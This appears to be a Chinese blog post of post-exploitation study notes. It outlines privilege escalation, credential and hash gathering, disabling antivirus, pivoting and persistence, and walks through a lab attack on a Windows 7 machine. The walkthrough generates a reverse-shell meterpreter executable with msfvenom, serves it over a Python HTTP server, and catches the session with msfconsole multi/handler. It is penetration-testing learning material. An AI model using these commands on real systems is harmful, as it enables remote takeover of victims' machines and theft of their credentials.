前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >后渗透学习笔记(一)

后渗透学习笔记(一)

作者头像
字节脉搏实验室
发布2020-03-08 16:30:51
2.8K0
发布2020-03-08 16:30:51
举报

什么是后渗透?

攻陷了服务器,主机取得一定权限(可能不是很高)就开始进入了后渗透阶段 把对方机器打蓝屏重启有什么作用? 使得我们修改注册表等配置信息可以生效 windows的控制权限UAC,重启才可以生效,可以使用远程溢出蓝屏,用户可能会以为是bug,意外情况,所以不会注意,从而使修改信息生效 1.权限提升:权限提升的几种方式 (1)利用更高权限的进程进行操作,获得会话session (2)windows下的用户控制,exe执行时弹出的框问你是否要执行,这个东西就是UAC (3)利用服务器里面的本地提权漏洞进行权限提升(会在msf中)

2.信息收集:服务器信息、Hash、防火墙杀毒软件(利用一些方式将其关闭,最好设置些策略)、账号密码(管理员的账号密码或哈希值(哈希传递等方式登录)) 服务器信息,浏览器的浏览记录,网络数据的监听捕获,敏感文件搜索,查看是否是一台虚拟机,最近执行的操作 3.内网渗透:端口转发(把内网的端口转到外网上面来,进行连接)、代理跳板 4.后门植入:永久后门维持权限(msf中集成了几种永久后门)

以下利用msfvenom生成木马获取权限开启后渗透阶段(当然也可以通过其他端口的漏洞等获取到meterpreter权限)

kali上先生成一个可以反弹shell得木马,这里我的win7靶机是64位,所以x64,如果是32位的使用x86

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 -f exe > msf1.exe

下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。

-h 帮助

之后开启httpserver python -m SimpleHTTPServer 800

然后win7上访问攻击机ip:800,对木马文件进行下载

然后点击执行,但是我这里不知道什么影响出现点小问题

会这样如果关掉,meterpreter上获取到的session就会断掉,为了完成实验这里我们不关闭,然后回到kali进入msfconsole

msfconsole中配置监听脚本 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 攻击机ip exploit

端口默认是4444

开启监听后,当靶机触发该木马时会获取到sessions

然后我们ctrl+c终止下,查看下sessions,看到我们获取到的会话id,然后进入

session -i 9(这里对应的id)

然后我们尝试用python交换端获取到一个稳定的ttl,但是好像win7上没有python环境,导致无法执行

最后我们还发现这样的反弹会话还不够稳定,一会可能还会断开连接(这里可能时我们生成的马没有完美的执行造成的吧)

这里也希望有大佬可以给我解个惑

----------------------

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档